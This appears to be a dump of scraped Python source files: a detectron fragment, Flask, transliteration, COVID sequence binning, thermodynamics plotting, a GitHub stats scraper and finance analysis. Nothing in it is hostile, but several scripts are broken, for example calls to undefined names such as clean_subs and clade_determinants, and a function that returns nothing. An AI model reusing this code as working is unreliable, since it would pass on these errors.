rois_blob_name,\n blobs[rois_blob_name], target_lvls,\n lvl_min, lvl_max)\n\n _distribute_rois_over_fpn_levels('rois')\n if cfg.MODEL.MASK_ON:\n _distribute_rois_over_fpn_levels('mask_rois')\n if cfg.MODEL.KEYPOINTS_ON:\n _distribute_rois_over_fpn_levels('keypoint_rois')\n","sub_path":"detectron/roi_data/reid.py","file_name":"reid.py","file_ext":"py","file_size_in_byte":17874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"453172089","text":"import os, sys\nimport logging\nimport uuid\nimport json\nimport asyncio\nimport argparse\n\nfrom aiobbox.exceptions import Stop\nimport aiobbox.server as bbox_server\nfrom aiobbox.cluster import get_box, get_cluster, get_ticket\nfrom aiobbox.utils import import_module\nfrom aiobbox.handler import BaseHandler\n\nlogger = logging.getLogger('bbox')\n\nclass Handler(BaseHandler):\n help = 'run bbox tasks'\n def add_arguments(self, parser):\n parser.add_argument(\n 'module',\n type=str,\n help='the task module to load')\n\n parser.add_argument(\n 'task_params',\n type=str,\n nargs='*',\n help='task arguments')\n\n async def run(self, args):\n cfg = get_ticket()\n if cfg.language != 'python3':\n print('language must be python3', file=sys.stderr)\n sys.exit(1)\n\n mod = import_module(args.module)\n\n if hasattr(mod, 'Handler'):\n handler = mod.Handler()\n else:\n handler = BaseHandler()\n\n parser = argparse.ArgumentParser(prog='bbox.py run')\n handler.add_arguments(parser)\n sub_args = parser.parse_args(args.task_params)\n try:\n await get_cluster().start()\n r = await handler.run(sub_args)\n if r:\n logger.debug('task return %s', r)\n finally:\n c = get_cluster()\n c.cont = False\n await asyncio.sleep(0.1)\n c.close()\n\n","sub_path":"aiobbox/tools/runtask.py","file_name":"runtask.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"81980350","text":"# -*- coding: utf-8 -*-\nimport pysrt\nimport re\n\n\ndef open_doc(source_text):\n try:\n subs = pysrt.open(source_text)\n return subs\n except UnicodeDecodeError:\n subs = pysrt.open(source_text, encoding='iso-8859-1')\n return subs\n\n\ndef sanitize(subs):\n sanitized = \"\"\n\n for sub in subs:\n sanitized += sub.text + \"\\n\"\n\n return sanitized\n\n\ndef concatinate_string_to_file(str, file):\n corpus = open(file, \"a\")\n corpus.write(str)\n\n\ndef tokenize_and_clean_subs(sanitized_subs):\n p = \"(?:'([\\wÀ-ÿ]+[\\'\\-]?[\\wÀ-ÿ]*)'|((?:[\\wÀ-ÿ]+[\\'\\-]?[\\wÀ-ÿ]*[\\'\\-]?\"\\\n \")+)|((?:'?[\\wÀ-ÿ]+[\\'\\-]?[\\wÀ-ÿ]*)+))\"\n pattern = re.compile(p)\n return pattern.findall(sanitized_subs)\n\n\nsubs = open_doc(\"Reservoir Dogs.srt\")\nsanitized_subs = sanitize(subs)\nprint(clean_subs(sanitized_subs))\n","sub_path":"Util/srt_sanitizer.py","file_name":"srt_sanitizer.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"388182938","text":"from flask import render_template\n\nfrom stocks import app, graph\nfrom stocks.graph import BadTickerException\nfrom flask.ext.wtf import Form\nfrom wtforms import StringField\n\nfrom decorators import nocache\n\nclass TickerForm(Form):\n ticker = StringField('')\n\n def validate(self):\n return Form.validate(self)\n\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef index():\n # Turn this into a field on the webpage for users to enter a ticker\n tickerIsBad = False\n form = TickerForm()\n if form.validate_on_submit():\n ticker = form.data['ticker']\n\n # ticker = \"CHRIS/CME_CL1\"\n if not ticker:\n tickerIsBad = True\n else:\n try:\n graph.graphData(ticker)\n except BadTickerException:\n tickerIsBad = True\n \n # return app.send_static_file(\"index.html\")\n return render_template(\"index.html\", form=form, badTicker=tickerIsBad, ticker=ticker)\n return render_template(\"index.html\", form=form) \n\n@app.route(\"/\", methods=[\"GET\"])\ndef get_chart():\n return app.send_static_file(\"chart.png\")\n","sub_path":"stocks/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"599429733","text":"#!/usr/bin/env python\n\n__author__ = 'Adam R. Smith'\n__license__ = 'Apache 2.0'\n\nfrom anode.base import obj_registry\n\nfrom collections import OrderedDict\nimport datetime\nimport fnmatch\nimport os\nimport re\nimport sys\nimport argparse\n\nimport yaml\n\ntemplates = {\n 'file':\n'''#!/usr/bin/env python\n\nfrom zope.interface import Interface\n\n{classes}\n'''\n , 'class':\n'''class I{name}(Interface):\n{methods}\n'''\n , 'method':\n'''\n def {name}({args}):\n pass\n'''\n , 'arg': '{name}={val}'\n}\n\ndescription = 'Anode utility for generating interfaces from object definitions (and vice versa).'\nparser = argparse.ArgumentParser(description=description)\nparser.add_argument('action', type=str, default='generate', choices=['generate'], help='Which action to perform.')\nargs = parser.parse_args()\n\nif os.getcwd().endswith('scripts'):\n sys.exit('This script needs to be run from the anode root.')\n\nif args.action == 'generate':\n service_dir, interface_dir = 'obj/services', 'interface'\n if not os.path.exists(interface_dir):\n os.makedirs(interface_dir)\n\n # Clear old generated files\n files = os.listdir(interface_dir)\n for file in fnmatch.filter(files, '*.py') + fnmatch.filter(files, '*.pyc'):\n os.unlink(os.path.join(interface_dir, file))\n\n open(os.path.join(interface_dir, '__init__.py'), 'w').close()\n\n # Generate the new definitions, for now giving each yaml file its own python service\n file_re = re.compile('(obj)/(.*)[.](yml)')\n for root, dirs, files in os.walk(service_dir):\n for filename in fnmatch.filter(files, '*.yml'):\n yaml_file = os.path.join(root, filename)\n file_match = file_re.match(yaml_file)\n if file_match is None: continue\n\n interface_name = file_match.group(2).rsplit(os.sep)[-1]\n interface_file = file_re.sub(r'interface/\\2.py', yaml_file)\n\n parent_dir = os.path.dirname(interface_file)\n if not os.path.exists(parent_dir):\n os.makedirs(parent_dir)\n\n methods = []\n yaml_text = open(yaml_file, 'r').read()\n defs = yaml.load_all(yaml_text)\n for def_set in defs:\n for name,_def in def_set.iteritems():\n # TODO: Handle more than one definition version for the same object type\n\n args = []\n for key,val in _def.iteritems():\n if isinstance(val, basestring):\n val = \"'%s'\" % (val)\n elif isinstance(val, datetime.datetime):\n # TODO: generate the datetime code\n val = \"'%s'\" % (val)\n elif isinstance(val, OrderedDict):\n val = dict(val)\n args.append(templates['arg'].format(name=key, val=val))\n args_str = ', '.join(args)\n\n methods.append(templates['method'].format(name=name, args=args_str))\n\n methods_str = ''.join(methods)\n class_name = interface_name.title().replace('_', '').replace('-', '')\n _class = templates['class'].format(name=class_name, methods=methods_str)\n\n interface_contents = templates['file'].format(classes=_class)\n open(interface_file, 'w').write(interface_contents)\n\n\n","sub_path":"scripts/anode-obj.py","file_name":"anode-obj.py","file_ext":"py","file_size_in_byte":3358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"600153479","text":"def normalize(input_text):\n\n сyrillic_alphabet = 'абвгдеёжзийклмнопрстуфхцчшщъыьэюя'\n latin_alphabet = ['a', 'b', 'v', 'g', 'd', 'e', 'ye', 'zh', 'z', 'i', 'y', 'k', 'l', 'm', 'n', 'o',\n 'p', 'r', 's', 't', 'u', 'f', 'kh', 'ts', 'ch', 'sh', 'shch', None, 'y', None, 'e', 'yu', 'ya']\n map = {}\n\n for index in range(len(сyrillic_alphabet)):\n\n сyrillic_letter_lower = ord(сyrillic_alphabet[index])\n map[сyrillic_letter_lower] = latin_alphabet[index]\n\n for index in range(len(сyrillic_alphabet)):\n\n сyrillic_letter_upper = ord(сyrillic_alphabet[index].upper())\n\n if latin_alphabet[index]:\n map[сyrillic_letter_upper] = latin_alphabet[index].capitalize()\n\n elif latin_alphabet[index] is None:\n map[сyrillic_letter_upper] = latin_alphabet[index]\n\n translated_text = input_text.translate(map)\n\n transliteration = ''\n\n for i in translated_text:\n if i.isalnum():\n transliteration += i\n else:\n transliteration += '_'\n\n return transliteration\n\n\ndef main():\n input_text = input()\n print(normalize(input_text))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"module_06/hw_5.py","file_name":"hw_5.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"252938500","text":"import sys, os\nimport genome_data_processing as gdp\nimport ecc_tools as tools\nimport timeit\n# import pydca-ER module\nimport matplotlib\n#matplotlib.use('agg')\nimport matplotlib.pyplot as plt\nfrom scipy import linalg\nfrom sklearn.preprocessing import OneHotEncoder\nimport expectation_reflection as ER\nfrom direct_info import direct_info\nfrom direct_info import sort_di\nfrom joblib import Parallel, delayed\nimport numpy as np\nimport pickle\nfrom gen_ROC_jobID_df import add_ROC\n\n#singularity exec -B /data/cresswellclayec/DCA_ER/biowulf/,/data/cresswellclayec/DCA_ER/covid_proteins /data/cresswellclayec/DCA_ER/LADER.simg python get_chrono.py G_aligned.fasta\n\n#aligned_fasta = 'covid_genome_full_aligned.fasta'\naligned_fasta = sys.argv[1] # clade aligned file\ndata_path = '/data/cresswellclayec/DCA_ER/covid_proteins/'\nroot_dir = '/data/cresswellclayec/DCA_ER/covid_proteins/'\ndata_out = '/data/cresswellclayec/DCA_ER/covid_proteins/cov_fasta_files/'\n\n#sample ID.. want to extract and bin bassed off of time.\n#>2020-04-20|Europe/UnitedKingdom/Wales|EPI_ISL_446771\n\n#import re\n#subject_genome = re.sub(\".fasta\",\"\",subject_genome_file)\n\nnucleotide_letters_full = np.array(['A','C','G','T','N','R','Y','S','W','K','M','B','D','H','V','U','-'])\n\n\n\ndef create_bins(lower_bound, width, quantity):\n \"\"\" create_bins returns an equal-width (distance) partitioning. \n It returns an ascending list of tuples, representing the intervals.\n A tuple bins[i], i.e. (bins[i][0], bins[i][1]) with i > 0 \n and i < quantity, satisfies the following conditions:\n (1) bins[i][0] + width == bins[i][1]\n (2) bins[i-1][0] + width == bins[i][0] and\n bins[i-1][1] + width == bins[i][1]\n \"\"\"\n \n\n bins = []\n for low in range(lower_bound, \n lower_bound + quantity*width + 1, width):\n bins.append((low,low+width))\n\ndef find_bin(value, bins):\n \"\"\" bins is a list of tuples, like [(0,20), (20, 40), (40, 60)],\n binning returns the smallest index i of bins so that\n bin[i][0] <= value < bin[i][1]\n \"\"\"\n \n for i in range(0, len(bins)):\n if bins[i][0] <= value < bins[i][1]:\n return i\n return -1 \n\nfrom Bio import SeqIO\nimport time\nimport datetime\nimport math\n\n\ndates = []\ntimestmp = []\nstmps = []\nbad_time_count = 0\nwith open(aligned_fasta,\"r\") as handle:\n\tfor i,record in enumerate(SeqIO.parse(handle, \"fasta\")):\n\t\t#print('record %d '%(i))\n\t\t#print('record date: ', record.id[0:10])\n\t\tdates.append(record.id[0:10])\n\t\ttry:\n\t\t\ttimestmp.append((i,time.mktime(datetime.datetime.strptime(record.id[0:10],\"%Y-%m-%d\").timetuple())))\n\t\t\tstmps.append(time.mktime(datetime.datetime.strptime(record.id[0:10],\"%Y-%m-%d\").timetuple()))\n\t\texcept(ValueError):\n\t\t\ttry:\n\t\t\t\ttimestmp.append((i,time.mktime(datetime.datetime.strptime(record.id[0:7],\"%Y-%m\").timetuple())))\n\t\t\t\tstmps.append(time.mktime(datetime.datetime.strptime(record.id[0:7],\"%Y-%m\").timetuple()))\n\t\t\texcept:\n\t\t\t\t#print('unknown time in ID: ', record.id)\n\t\t\t\tbad_time_count += 1\n\t\t\t\tpass\n\n\tsorted_timestmp = sorted(timestmp,key=lambda x: x[1])\nhandle.close()\t\n\n\nchrono_bins = create_bins(int(min(stmps))-10, math.ceil(((max(stmps)+10)-(min(stmps)-10))/3.), 3)\nfrom scipy.stats import binned_statistic\n\n\nhist, bin_edges = np.histogram(stmps, bins=10, range=(int(min(stmps)), int(max(stmps))))\nprint(hist)\nprint(bin_edges)\nprint('with max %d and min %d timestamps we have the following chrono-bins:\\n'%(max(stmps),min(stmps)),chrono_bins)\nprint('%d timed sequences'%len(stmps)) \n\nprint('%d bad timestmps'%bad_time_count) \nfor clade in clade_determinants.keys():\n\tprint('Clade: %s has %d sequences'%(clade,len(clade_records[clade])))\n\tprint('writing...')\t\t\n\tout_file1 = data_out+'%s_aligned.fasta'%clade\n\twith open(out_file1,\"w\") as output_handle:\n\t\tSeqIO.write(clade_records[clade],output_handle,\"fasta\")\n\toutput_handle.close()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"get_chrono.py","file_name":"get_chrono.py","file_ext":"py","file_size_in_byte":3905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"577839267","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.integrate as integrate # the package to find the area\n\n\nP1 = 1.0 # Pa\nV1 = 1.0 # m^3\nP2 = 40.0 # Pa\nT1 = 20.0 + 272.15 # Kelvin\nT3 = 1000.0 + 272.15 # Kelvin\nR = 8.3144598 # J * /(mol * K)\ncp = 7.0 * R / 2.0 # specific heat cap (J * /(mol * K))\ngamma = 1.4 # air constant\n\nV2 = V1 * np.power(P1 / P2, 1 / gamma)\n\nT2 = T1 * np.power(V1 / V2, gamma - 1)\n\nV3 = T3 * V2 / T2\n# = V2 + nR(T3 - T2) / P2 # find an eq\n\nP3 = P2 # Isobar!\nP4 = P1 # Isobar!\n\nV4 = V3 * np.power(P3 / P4, 1 / gamma)\n\nT4 = T3 * np.power(V4 / V3, gamma - 1) # check it again\n\nT1 = T4 * V1 / V4\n\nn = P2 * V2 / (R * T2) # the number of moles using the ideal gas law\n\n# plot time!\nplt.figure(figsize=(10, 10))\nV = np.linspace(V1, V2)\n# the curve on the left P1 -> P2 (ADIABATIC)\nplt1 = P1 * np.power(V1 / V, gamma)\nplt.plot(V, plt1, 'r--', linewidth=1.5)\n\nV = np.linspace(V4, V3) # the curve on the right P3 -> P4 (ADIABATIC)\nplt2 = P4 * np.power(V4 / V, gamma)\nplt.plot(V, plt1, 'b--', linewidth=1.5)\n\nV = np.linspace(V2, V3)\nplt3 = P2 * np.ones(V.shape) # the line at the top (ISOBAR)\nplt.plot(V, plt3, 'g-', linewidth=1.5)\n\nV = np.linspace(V1, V4)\nplt4 = P1 * np.ones(V.shape) # the line at the bottom (ISOBAR)\nplt.plot(V, plt4, 'k-', linewidth=1.5)\n\n\nplt.xlabel('Volume, V (m ^ 3)', fontsize=18)\nplt.ylabel('Pressure, P (Pa)', fontsize=18)\nplt.title(\"Brayton Cycle\", fontsize=30)\nplt.grid('on')\nplt.legend(loc=0, prop={'size': 15})\n#plt.axis([0, 2, 0, 50])\n\n\n# calc the areas\n\n# plt1\na = V2\nb = V1\nf = lambda x: P1 * np.power(V1 / x, gamma)\nplt1Area, error = integrate.quad(f, a, b)\n\n# plt2\na = V3\nb = V4\nf = lambda x: P4 * np.power(V4 / x, gamma)\nplt2Area, error = integrate.quad(f, a, b)\n\n# plt3\na = V2\nb = V3\nf = lambda x: P2\nplt3Area, error = integrate.quad(f, a, b)\n\n# plt4\na = V1\nb = V4\nf = lambda x: P1\nplt4Area, error = integrate.quad(f, a, b)\n\nWork = plt2Area + plt3Area - plt1Area - plt4Area\nQ_h = n * cp * (T3 - T2)\n\neta1 = (Work / Q_h) * 100\neta2 = (1 - np.power(P1 / P2, 1 - 1 / gamma)) * 100\nprint(\"Eta1: {} , Eta2: {}\".format(eta1, eta2))\n\nprint(\"Area: {}\".format(Work))\n\nplt.show()\n","sub_path":"BraytonCycle.py","file_name":"BraytonCycle.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"84380867","text":"\"\"\"\nanalyzes .wav files for peak freqs and stores in layered dict structure and\nwrites to data.json file\nlast updated: 2.12.2020\njohn eagle\n\"\"\"\n\n# std library imports\nimport sys\n# package imports\nfrom parameters import params\nimport program_functions as pf\nimport timings\nimport text_file_io as tfio\n\n# set custom parameters\nparams['offset thresh'] = \"8:00\"\nparams['offset unit'] = \"minute\"\nparams['offset inc'] = -2\nparams['total peaks'] = 60\nparams['playback duration'] = 5\n\nparams['total peaks'] = 120\n\ntry:\n # see if user provided directory name at command line\n pf.set_directory(sys.argv[1], params)\nexcept:\n # default\n pf.set_directory(\"default results\", params)\n\nmics = ['shotgun', 'stereo']\n\n# SCORE\n\"\"\"\n# do macro_times first\nprint(\"BUILDING MACRO DICT\")\nmacro = pf.make_macro_sections(params, timings.macro_times, 4, mics)\ntfio.write_out_dict_json(macro, params=params)\n\"\"\"\n\"\"\"\n# part 1\nprint(\"BUILDING PART 1\")\npart1 = pf.make_macro_sections(params, timings.player_one, 1, mics, one_part=1)\ntfio.write_out_dict_json(part1, params=params)\n\nread_back = tfio.read_in_dict_json(params=params)\nprint(read_back['1']['shotgun'])\n\"\"\"\n\"\"\"\n# part 2\nprint(\"BUILDING PART 2\")\npart2 = pf.make_macro_sections(params, timings.player_two, 1, mics, one_part=2)\ntfio.write_out_dict_json(part2, params=params)\n\nread_back = tfio.read_in_dict_json(params=params)\nprint(read_back['1']['shotgun'])\n\n\"\"\"\n\"\"\"\n# part 3\nprint(\"BUILDING PART 3\")\npart3 = pf.make_macro_sections(params, timings.player_three, 1, mics, one_part=3)\ntfio.write_out_dict_json(part3, params=params)\n\nread_back = tfio.read_in_dict_json(params=params)\nprint(read_back['1']['shotgun'])\n\"\"\"\n# part 4\nprint(\"BUILDING PART 4\")\npart4 = pf.make_macro_sections(params, timings.player_four, 1, mics, one_part=4)\ntfio.write_out_dict_json(part4, params=params)\n\nread_back = tfio.read_in_dict_json(params=params)\nprint(read_back['1']['shotgun'])\n","sub_path":"ICP/fieldHarmonyPackage/analyze_audio.py","file_name":"analyze_audio.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"320552175","text":"from __future__ import print_function\r\nfrom github import Github\r\nimport urllib,json\r\nimport codecs\r\nimport urllib.request as UrlRequest\r\nimport requests\r\nimport base64\r\nfrom urllib.error import URLError, HTTPError\r\nimport re\r\nfrom bs4 import BeautifulSoup,SoupStrainer\r\nimport os\r\nimport time\r\nusername=b'yyyyyyyyyy'\r\npassword=b'xxxxxxxxxx'\r\nbase64string = base64.b64encode(username + b\":\" + password)\r\n\r\nfrom dataclean import scrape_element,get_url_content,get_subscribers,get_numberoffiles,get_package,get_wiki,get_submodules\r\nfrom license_file import get_license\r\nfrom print_file import print_file\r\n\r\ng = Github(client_id=\"\",client_secret=\"\",per_page=100)\r\nprint(\"Rate remaining \",g.get_rate_limit().rate.remaining)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n# -----\r\nif __name__=='main':\r\n \r\n debug = open(\"debug.log\", \"w\")\r\n outputfile = open(\"stats.csv\", \"w\")\r\n outputfile.write(\"Organization,Name, URL, Forks_Count, Watchers_Count, Stargazers, Release Count, Branch Count, Commit Count, Contrib Count,License, LicenseText, ReadmeText, SubModules, PackageJSON, Patents \\n\")\r\n #orgs = ['apple','ibm','google','facebook','twitter','mozilla','twbs','github','jquery','h5bp','angular']\r\n #orgs = ['apple', 'ibm', 'google', 'facebook', 'twitter', 'mozilla', 'twbs', 'github', 'jquery', 'h5bp', 'angular']\r\n outputfile.close()\r\n debug.close()\r\n orgs = []\r\n\r\n for orgname in orgs:\r\n for repo in g.get_user(orgname).get_repos():\r\n #print(repo.name)\r\n #if(repo.name == 'FreeCAD-addons'):\r\n #print(\"Repo URL:\", repo.url)\r\n # print(\"Repo watchers :\", repo.watchers_count)\r\n # print(\"Repo stargazers: \", repo.stargazers_count)\r\n # print(\"Repo forks count : \", repo.forks_count)\r\n releases = repo.get_releases()\r\n relcount = 0\r\n branchcount = 0\r\n commitcount =0\r\n contribcount = 0\r\n watchers=0\r\n for rel in releases:\r\n relcount = relcount + 1;\r\n\r\n\r\n if (0):\r\n\r\n headers = {\r\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36\"}\r\n url = \"https://api.github.com/organizations?since=\"\r\n sincenum = 24600;\r\n while (sincenum):\r\n newurl = url + str(sincenum)\r\n response = UrlRequest.Request(newurl, headers=headers)\r\n result = UrlRequest.urlopen(response)\r\n data = result.read().decode('utf8')\r\n listofrepos = json.loads(data)\r\n if len(listofrepos) is 0:\r\n sincenum = 0\r\n else:\r\n for ijk in listofrepos:\r\n print(ijk[\"login\"])\r\n sincenum = sincenum + 100\r\n #print(\"Since num\", sincenum)\r\n #print(\"Rate remaining \", g.get_rate_limit().rate.remaining)\r\n\r\n # -----\r\n if (1):\r\n #print(\r\n #Organization,Name, URL, Forks_Count, Watchers_Count, Stargazers, Release Count, Branch Count, Commit Count, Contrib Count,License )\r\n # orgs = ['apple','ibm','google','facebook','twitter','mozilla','twbs','github','jquery','h5bp','angular']\r\n # orgs = ['apple', 'ibm', 'google', 'facebook', 'twitter', 'mozilla', 'twbs', 'github', 'jquery', 'h5bp', 'angular']\r\n orgs = ['apple']\r\n\r\n\r\n #for j in orgs:\r\n # print(j)\r\n #filteredrepos=['azonenberg','FreeCAD']\r\n filteredrepos=[]\r\n deprepos=[];\r\n print(\"Started Collecting Stats.....\")\r\n repoid=0\r\n urldict={}\r\n repodict={}\r\n #with open('Listofrepos', \"r\") as myfile:\r\n if(0):\r\n with open('Repos3', \"r\") as myfile:\r\n for line in myfile:\r\n lines=line.split(\"/\")\r\n filteredrepos.append(lines[3])\r\n\r\n repoid=repoid+1\r\n deprepos.append(lines[4])\r\n repodict[lines[3]]=lines[4]\r\n key=lines[3]+\"_\"+lines[4]\r\n linestr = line.replace('\\n', '')\r\n\r\n urldict[key]=linestr\r\n #print(lines[3],\" \",lines[4])\r\n # modified on 01-11-2016 if (repo.name in ('FreeCAD-addons', 'openfpga')):\r\n #filteredrepos = ['azonenberg']\r\n #for k, v in urldict.items():\r\n # print(\"Key \", k,\" Value \", v)\r\n if(0):\r\n orgrepos=[]\r\n repoid=0\r\n #print(\"Just before scraping\",len(filteredrepos))\r\n filteredrepos=[]\r\n with open('orglist.main','r') as myfile:\r\n for line in myfile:\r\n line=line.replace('\\n','')\r\n #if(re.match(r'^d',line)):\r\n filteredrepos.append(line)\r\n\r\n for orgname in filteredrepos:\r\n try:\r\n try:\r\n # print(\"Getting \",orgname)\r\n orguser=g.get_user(orgname)\r\n except HTTPError as e:\r\n print(\"Error\")\r\n orgrepos=orguser.get_repos()\r\n #orgrepos.append('activemq')\r\n except HTTPError as e:\r\n print(\"Error\")\r\n\r\n #for repo in orgrepos:\r\n for repo in g.get_repos(since=167170):\r\n #if(repo.name in ['activemq']):\r\n print(\"Collecting stats for \",repo.id)\r\n debug=open(\"debug.log\",\"a\")\r\n outputfile = open(\"stats.csv\", \"a\")\r\n debug.write(\"Repo %s, UserName %s \\n\" %(repo.name,repo.owner.login))\r\n relcount = 0\r\n branchcount = 0\r\n commitcount = 0\r\n contribcount = 0\r\n watcherscount=0\r\n\r\n contents_url = repo.url + \"/contents/\"\r\n packageyes= (get_package(contents_url))\r\n raterem = g.get_rate_limit().rate.remaining\r\n debug.write(\"Rate Limit %d \\n\" %(raterem))\r\n if (int(raterem) < 500):\r\n print(\"Sleeping......\")\r\n time.sleep(7200)\r\n if(packageyes):\r\n # Created date\r\n print(\"Collecting STATS....\")\r\n releases = repo.get_releases()\r\n created = repo.created_at\r\n updated = repo.updated_at\r\n size = repo.size\r\n langlist = repo.get_languages()\r\n languages = []\r\n totalfiles = 0\r\n for key in langlist.keys():\r\n value=langlist[key]\r\n #print(key,\" \",value)\r\n languages.append(key)\r\n totalfiles = totalfiles + int(value)\r\n\r\n languages = \":\".join(languages)\r\n if(repo.forks_count > 1 and repo.fork == 0):\r\n print(\"Getting Releases \")\r\n for rel in releases:\r\n relcount = relcount + 1;\r\n for branches in repo.get_branches():\r\n branchcount = branchcount + 1;\r\n print(\"Getting Contributors\")\r\n for contrib in repo.get_contributors():\r\n contribcount = contribcount + 1;\r\n\r\n for commits in repo.get_commits():\r\n commitcount = commitcount + 1;\r\n watcherscount=get_subscribers(repo.url)\r\n print(\"LICENSE\")\r\n glicense=\"\"\r\n licensefiles=\"\"\r\n glicense,licensefiles = get_license(repo.url)\r\n print(\"DEPS\")\r\n dependsonpatents,listofpatents=get_wiki(repo.owner.login,repo.name)\r\n print(\"After WIKI\")\r\n wikitext=[]\r\n wikitextfull=\"\"\r\n if (os.path.isfile(dependsonpatents)):\r\n\r\n with open(dependsonpatents, \"r\", encoding=\"utf8\") as myfile:\r\n\r\n for line in myfile:\r\n line = re.sub('[^a-zA-Z0-9\\.]', ' ', line)\r\n line = re.sub('\\s+', ' ', line)\r\n line.strip()\r\n wikitext.append(line)\r\n wikitextfull = \" \".join(wikitext)\r\n wikitextfull= (wikitextfull[:32000] + '..') if len(wikitextfull) > 32000 else wikitextfull\r\n readmetext=[]\r\n readmetext1=\"\"\r\n gitmodules=[]\r\n packagejson=[]\r\n dependentrepos =(get_submodules(contents_url))\r\n print(\"Printing DEPS\")\r\n if(type(dependentrepos) == type(list()) and (len(dependentrepos) > 0)):\r\n for i in dependentrepos:\r\n\r\n if('README' in i):\r\n print(\"printing README\")\r\n with open(i, \"r\",encoding=\"utf8\") as myfile:\r\n for line in myfile:\r\n line = re.sub('[^a-zA-Z0-9\\.]', ' ', line)\r\n line = re.sub('\\s+', ' ', line)\r\n line.strip()\r\n readmetext.append(line)\r\n readmetext1=\" \".join(readmetext)\r\n readmetext1=(readmetext1[:32000] + '..') if len(readmetext1) > 32000 else readmetext1\r\n\r\n if ('modules' in i):\r\n print(\"printing MODULES\")\r\n with open(i, \"r\") as myfile:\r\n for line in myfile:\r\n line = re.sub('[^a-zA-Z0-9\\/\\.]', ' ', line)\r\n line = re.sub('\\s+', ' ', line)\r\n line.strip()\r\n gitmodules.append(line)\r\n gitmodules = \" \".join(gitmodules)\r\n gitmodules = (gitmodules[:32000] + '..') if len(gitmodules) > 32000 else gitmodules\r\n if ('package' in i):\r\n print(\"printing PACKAGE\")\r\n if (os.path.isfile(i)):\r\n with open(i, \"r\") as myfile:\r\n for line in myfile:\r\n line = re.sub('[^a-zA-Z0-9\\/\\.]', ' ', line)\r\n line = re.sub('\\s+', ' ', line)\r\n line.strip()\r\n packagejson.append(line)\r\n packagejson=\" \".join(packagejson)\r\n packagejson = (packagejson[:32000] + '..') if len(packagejson) > 32000 else packagejson\r\n licensetext = []\r\n glicense.strip()\r\n if(os.path.isfile(licensefiles)):\r\n\r\n with codecs.open(licensefiles,\"r\",encoding=\"utf8\") as myfile:\r\n\r\n for line in myfile:\r\n line = re.sub('[^a-zA-Z0-9\\.]', ' ', line)\r\n line = re.sub('\\s+', ' ', line)\r\n line.strip()\r\n licensetext.append(line)\r\n licensetext=\" \".join(licensetext)\r\n licensetext = (licensetext[:32000] + '..') if len(licensetext) > 32000 else licensetext\r\n apps_using = []\r\n\r\n totalfiles = get_numberoffiles(contents_url, 0)\r\n print(\"Printing stat file\\n\")\r\n outputfile.write(\"%s,%s,%s,%d,%d,\" %(repo.owner.login,repo.name,repo.html_url,repo.forks_count,watcherscount))\r\n outputfile.write(\"%d,%d,%d,%d,%d,\" %(repo.stargazers_count, relcount, branchcount, commitcount, contribcount))\r\n outputfile.write(\"%s,%s,%d,%s,%d,%s,\\\"%s\\\",\\\"%s\\\"\" %(str(created),str(updated),size,languages,totalfiles,glicense,licensetext,readmetext1))\r\n outputfile.write(\"\\\"%s\\\",\\\"%s\\\",\\\"%s\\\",\\\"%s\\\",\\\"%s\\\",\\n\" %(gitmodules, packagejson,wikitextfull,''.join(listofpatents),apps_using))\r\n debug.close()\r\n outputfile.close()\r\n \r\n repoid=repoid+1\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"MachineLearning/WebCrawling_TextAnalytics/github.py","file_name":"github.py","file_ext":"py","file_size_in_byte":13436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"588068658","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nplt.rcParams['font.sans-serif'] = ['SimHei']\nplt.rcParams['axes.unicode_minus'] = False\n\n\n\n# =============================================================================\n# from WindPy import w\n# \n# w.start()\n# \n# def getWsd(wsd):\n# df = pd.DataFrame(wsd.Data).T\n# df.index = wsd.Times\n# df.columns = wsd.Codes \n# return df\n# \n# \n# wsd = w.wsd(\"881001.WI,000016.SH,CBA00102.CS,CBA00202.CS,CBA00662.CS\", \"pct_chg\", \"2000-01-01\", \"2018-07-29\", \"Period=M\")\n# # 全A, 50, 新综合, 综合, 10年国债 \n# df_idx = getWsd(wsd)\n# =============================================================================\n\n\n\ndf_idx = pd.read_csv('idx.csv', index_col=0, parse_dates=[0])\ndf_idx = df_idx['2002':].iloc[:, [0, 2]]\n\nlag = 12\nsr_corr = df_idx['881001.WI'].rolling(lag).corr(df_idx['CBA00102.CS'])\nsr_beta = sr_corr / df_idx['881001.WI'].rolling(lag).std() * df_idx['CBA00102.CS'].rolling(lag).std()\n\nsr_corr.dropna(inplace=True)\nsr_beta.dropna(inplace=True)\n# 分年度相关性\nsr_corr_gp = sr_corr.groupby(lambda x: x.year).agg(lambda x: x[-1]).dropna()\nsr_beta_gp = sr_beta.groupby(lambda x: x.year).agg(lambda x: x[-1]).dropna()\n\n#881001指数表现\nsr_881 = (1 + 